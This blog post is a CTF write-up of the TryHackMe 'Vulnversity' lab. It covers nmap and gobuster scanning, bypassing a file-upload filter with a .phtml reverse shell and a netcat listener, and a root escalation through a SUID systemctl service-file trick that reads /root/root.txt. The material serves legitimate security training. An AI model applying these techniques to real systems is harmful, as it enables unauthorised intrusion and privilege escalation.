Planet DesKel

DesKel's official page for CTF write-up, Electronic tutorial, review and etc.

8 August 2020

THM write-up: Vulnversity

7 minutes to read

titlecard

Link: https://tryhackme.com/room/vulnversity

Another day, another challenge. Today, I am going for a vulnerable machine challenge. This challenge is created by the one and the only one, tryhackme itself. Vulnversity or known as ‘vulnerable university’ (i guess) covers 3 basic penetration test phases which are

Let’s move on to our first given task!

Task 2: Reconnaissance (Part 1 - nmap)

Reconnaissance is a pentest phase where the tester performs information gathering. Tools such as nmap, gobuster, dirbuster, Maltago, Sparta, e.t.c are used to gather all the available information of a machine. This information can be an open port, range of IP address, potential vulnerability and user information.

For this challenge, I am going to use nmap to scan all the available information on the deployed machine.

Task 2-2: Number of open port

Using the following nmap command, a total of 6 open ports can be detected.

nmap -Pn -p-10000 -A -v <MACHINE IP>

Explanation on the flag:

nmap

Task 2-3: Squid proxy version

By using the nmap scanner, I am able to identify the version.

squid

Task 2-4: The meaning of -p-400 flag

By referring to the task 2-2, the flag means scanning the first 400 ports.

Task 2-5: What will not be resolved by -n flag

Referring to the nmap documentation, the DNS will not be resolved by using -n flag.

Task 2-6: OS detection

By using the nmap scanner, I am able to identify the OS of the machine.

OS

Task 2-7: Port that run by the web server.

Web servers are not always run on the port 80, that is why we miss it out sometime. The webserver is located on port 3333.

Task 3: Reconnaissance (Part 2 - gobuster)

Since we know the webserver port of the machine. Let us look into more detail and find the hidden directory of the webserver. You can use gobuster or dirbuster to complete this task. For the sake of simplicity, I’m going to follow the description.

To locate the hidden directory of the webserver, use the following command

gobuster dir -u http://<MACHINE IP>:3333 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt

Explanation on the flag:

Task 3-2: The hidden directory

The hidden directory is called ‘internal’ where we can upload a file to perform a potential exploitation.

hidden

Task 4: Threat modeling and vulnerability identification

Now, we have found a form to upload files. Maybe we can leverage this form and execute our payload that will lead to compromising the webserver.

Task 4-1: Blocked file

By uploading a few files with a different extension, it seems that the webserver blocked file with .php extension. PHP files are the most common file used to execute the payload on the webserver which is blocked by the server and we have to think another way around.

web

Task 4-2: Burp suite

The following task required the use of Burp suite. Burp suite is a graphical tool for testing web application security. Be sure to check it out.

Task 4-3: Burp suite in Intruder mode

Without further ado, we are going to guess the other PHP files that are accepted by the webserver. The extension can be .php3, .php4, .php5 and .phtml. Create a wordlist of the extension and upload to the server.

php

After that, intercept the traffic and send it to the intruder as shown in the figure below.

intercept

Navigate to the Intruder tab and then position tab. Find the uploaded file name as shown in the figure below.

filename

After located the filename, change the extension one by one (from .php3 to .phtml) as shown in the figure below

change

Then start the attack. The attack return a success response by uploading the file with .phtml extension.

attack

Task 4-4: Exploitation

Since we know .phtml file is a potential PHP file for our payload. Now we are going to use a PHP reverse shell as our payload. I am going to break down this task into steps:

phtml

nc -lvnp 1234

netcat

Task 4-5: Who is on the server

On the reverse shell, type the following command to locate the user.

ls /home

home

Task 4-6: Capture bill’s flag

On the reverse shell, type the following command for the flag

cat /home/bill/user.txt

Task 5: Exploitation (Superuser)

Task 5-1: Where is the SUID files?

The SUID files is located on /bin/systemctl

Task 5-2: Capture the root flag

This task is a little bit challenging. A big thanks to Paradox and Darkstar from the tryhackme discord channel, I’m able to solve this challenge by using a tool called GTFObins. You hear me, is GTFO or get the freakout :)

This task requires systemctl from GTFObins. At first glance, you are given two choices to exploit the machine using either SUID or SUDO. However, the machine can’t work with sudo way and we have to go for SUID way.

For SUID way, you need to mess around with the shell. Do not let the sudo trick you! You can run the shell in the /bin directory without copying or cp the /bin/systemctl. Here are the steps:

cd /bin
sh
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF
cat /tmp/output

root

Voila, you get your final flag of the challenge

Conclusion

Alright, this is the end of the challenge for vulnversity. See you again !!

tags: tryhackme - CTF - recon - privilege_escalate - reverse_shell

Thanks for reading. Follow my twitter for latest update

If you like this post, consider a small donation. Much appreciated. :)


Vortex


© 2020 DesKel